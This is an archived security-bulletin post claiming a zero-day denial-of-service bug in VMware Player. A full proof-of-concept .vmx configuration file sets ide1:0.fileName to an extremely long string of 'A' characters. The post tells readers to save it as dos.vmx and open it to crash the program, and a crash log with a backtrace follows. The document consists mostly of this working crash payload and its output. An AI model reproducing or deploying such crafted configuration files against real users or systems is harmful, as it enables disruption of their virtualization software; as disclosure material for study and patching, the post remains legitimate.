TUCoPS :: VMWare :: b06-3159.htm

Vm ware 0day dos exploit by n00b.
Vm ware 0day dos exploit by n00b.
Vm ware 0day dos exploit by n00b.



Credit's : n00b =0D
 =0D
email : co296@aol.com=0D 
 =0D
Erm was wondering if you could take a close look at this it is a 0day dos exploit by me i found tonight in vmware i have even debug for you guy's to take a look at.I hope you guy's will put it up after checking through it.Ok the first thing is vmware use's.vmx file's as like config file's =0D
 =0D
the problem as follows in vmx file's we have to change the name of our file.iso =0D
Following line's ide1:0.fileName =  =0D
 =0D
but if wee change it to the following it will cause a d0s and vmware will have to be shut down and rebooted.The file has an overly long file name as follows =0D
example.<.Expliotation.>=0D
#Edit line below to change ISO to boot from=0D
ide1:0.fileName = AAAA etc. and alot more see dubug for exact amount. .iso=0D
 =0D
Save as =0D
dos.vmx =0D
 =0D
Open with vmare player and you will see it crash..I have provided the following proof of concept available here =0D
 =0D
[code]=0D
config.version = "8"=0D
virtualHW.version = "4"=0D
displayName = "credit's to n00b for find this vouln"=0D
annotation = "Live CD ISO http://www.irongeek.com"=0D 
guestinfo.vmware.product.long = "credit's to n00b for find this vouln"=0D
guestinfo.vmware.product.url = "http://www.millw0rm.com"=0D 
guestinfo.vmware.product.short = "LCDI"=0D
guestinfo.vmware.product.version.major = "1"=0D
guestinfo.vmware.product.version.minor = "0"=0D
guestinfo.vmware.product.version.revision = "0"=0D
guestinfo.vmware.product.version.type = "release"=0D
guestinfo.vmware.product.class = "virtual machine"=0D
guestinfo.vmware.product.build = "1.0.0rc8-20051212"=0D
uuid.action = "create"=0D
guestOS = "winxppro"=0D
#####=0D
# Memory=0D
#####=0D
memsize = "128"=0D
# memsize = "256"=0D
# memsize = "512"=0D
# memsize = "768"=0D
#=0D
# Alternative larger memory allocations=0D
#####=0D
# USB=0D
#####=0D
usb.present = "TRUE"=0D
#####=0D
# Floppy=0D
#####=0D
floppy0.present = "FALSE"=0D
#####=0D
# IDE Storage=0D
#####=0D
ide1:0.present = "TRUE"=0D
#Edit line below to change ISO to boot from=0D
ide1:0.fileName = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.iso"=0D
ide1:0.deviceType = "cdrom-image"=0D
ide1:0.startConnected = "TRUE"=0D
ide1:0.autodetect = "TRUE"=0D
#####=0D
# Network=0D
#####=0D
ethernet0.present = "TRUE"=0D
ethernet0.connectionType = "nat"=0D
# ethernet0.connectionType = "bridged"=0D
#=0D
# Switch these two to enable "Bridged" vs. "NAT"=0D
#####=0D
# Sound=0D
#####=0D
sound.present = "TRUE"=0D
sound.virtualDev = "es1371"=0D
sound.autoDetect = "TRUE"=0D
sound.fileName = "-1"=0D
#####=0D
# Misc.=0D
#=0D
# (normal)  high=0D
priority.grabbed = "high"=0D
tools.syncTime = "TRUE"=0D
workingDir = "."=0D
#=0D
# (16)  32  64=0D
sched.mem.pShare.checkRate = "32"=0D
#=0D
# (32)  64  128=0D
sched.mem.pshare.scanRate = "64"=0D
#=0D
# Higher resolution lockout, adjust values to exceed 800x600=0D
svga.maxWidth = "800"=0D
svga.maxHeight = "600"=0D
#=0D
# (F) T=0D
isolation.tools.dnd.disable = "FALSE"=0D
#=0D
# (F) T=0D
isolation.tools.hgfs.disable = "FALSE"=0D
#=0D
# (F) T=0D
isolation.tools.copy.disable = "FALSE"=0D
#=0D
# (F) T=0D
isolation.tools.paste.disable = "FALSE"=0D
#=0D
# (T) F=0D
logging = "TRUE"=0D
#=0D
#=0D
# (F) T=0D
log.append = "FALSE"=0D
#=0D
# (3) number of older files kept=0D
log.keepOld = "1"=0D
#=0D
# (0) microseconds=0D
keyboard.typematicMinDelay = 1000000=0D
uuid.location = "56 4d f1 ae 7b ed fe a2-e2 0d 49 3d 6d 3c d4 4a"=0D
uuid.bios = "56 4d f1 ae 7b ed fe a2-e2 0d 49 3d 6d 3c d4 4a"=0D
ethernet0.addressType = "generated"=0D
ethernet0.generatedAddress = "00:0c:29:3c:d4:4a"=0D
ethernet0.generatedAddressOffset = "0"=0D
checkpoint.vmState = "live-cd-iso.vmss"=0D
 =0D
tools.remindInstall = "TRUE"=0D
[/code]=0D
 =0D
Open with note pad and save as dos.vmx =0D
 =0D
the following debug info is available..=0D
 =0D
=0D
Thnx to n00b lo0l....It's so late .=0D
 =0D
=0D
[code]=0D
vmx| [msg.cdromImage.nofile] File "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC:/ob/bora-19317/bora/lib/string/str.c:192 Buffer too small 0x430f6f=0D
Mar 15 11:19:18: vmx| Backtrace:=0D
Mar 15 11:19:18: vmx| ----Backtrace using dbghelp.dll----=0D
Mar 15 11:19:18: vmx| Module path: C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe=0D
Mar 15 11:19:18: vmx| Module directory: C:\Program Files\VMware\VMware Player\bin\=0D
Mar 15 11:19:18: vmx| backtrace[00] ebp 0x0012f224 eip 0x00436ada params 0x0043ac30 0000000000 0x0012f648 0x00413d5d [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x00035ada] (no symbol information)=0D
Mar 15 11:19:18: vmx| backtrace[01] ebp 0x0012f234 eip 0x0043b366 params 0000000000 0x0012f248 0x0abb4258 0x6f2f3a43 [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x0003a366] (no symbol information)=0D
Mar 15 11:19:18: vmx| backtrace[02] ebp 0x0012f648 eip 0x00413d5d params 0x0067bbfc 0x0067bc1c 0x000000c0 0x00430f6f [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x00012d5d] (no symbol information)=0D
Mar 15 11:19:18: vmx| backtrace[03] ebp 0x0012f668 eip 0x0041ae4e params 0x00724daa 0x0abb4258 0x00001000 0x08ef7e88 [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x00019e4e] (no symbol information)=0D
Mar 15 11:19:18: vmx| backtrace[04] ebp 0x0012f688 eip 0x00430f6f params 0000000000 0x00000002 0x0abb4258 0x08ef5fe0 [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x0002ff6f] (no symbol information)=0D
Mar 15 11:19:18: vmx| backtrace[05] ebp 0x0012f6b4 eip 0x0040e499 params 0000000000 0x00000002 0x08ef5fe0 0000000000 [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x0000d499] (no symbol information)=0D
Mar 15 11:19:18: vmx| backtrace[06] ebp 0x0012f6d8 eip 0x0040f778 params 0x00000002 0x0abb4258 0x08ef5fe0 0x000000c9 [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x0000e778] (no symbol information)=0D
Mar 15 11:19:18: vmx| backtrace[07] ebp 0x0012f780 eip 0x00416389 params 0000000000 0x00000002 0x006766a0 0x0012f7a8 [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x00015389] (no symbol information)=0D
Mar 15 11:19:18: vmx| backtrace[08] ebp 0x0012f798 eip 0x00416426 params 0x00000002 0x006766a0 0x08e84170 0x08e84780 [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x00015426] (no symbol information)=0D
Mar 15 11:19:18: vmx| backtrace[09] ebp 0x0012f7bc eip 0x0040ffd7 params 0x0012f7e0 0x005af633 0000000000 0x08f0d800 [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x0000efd7] (no symbol information)=0D
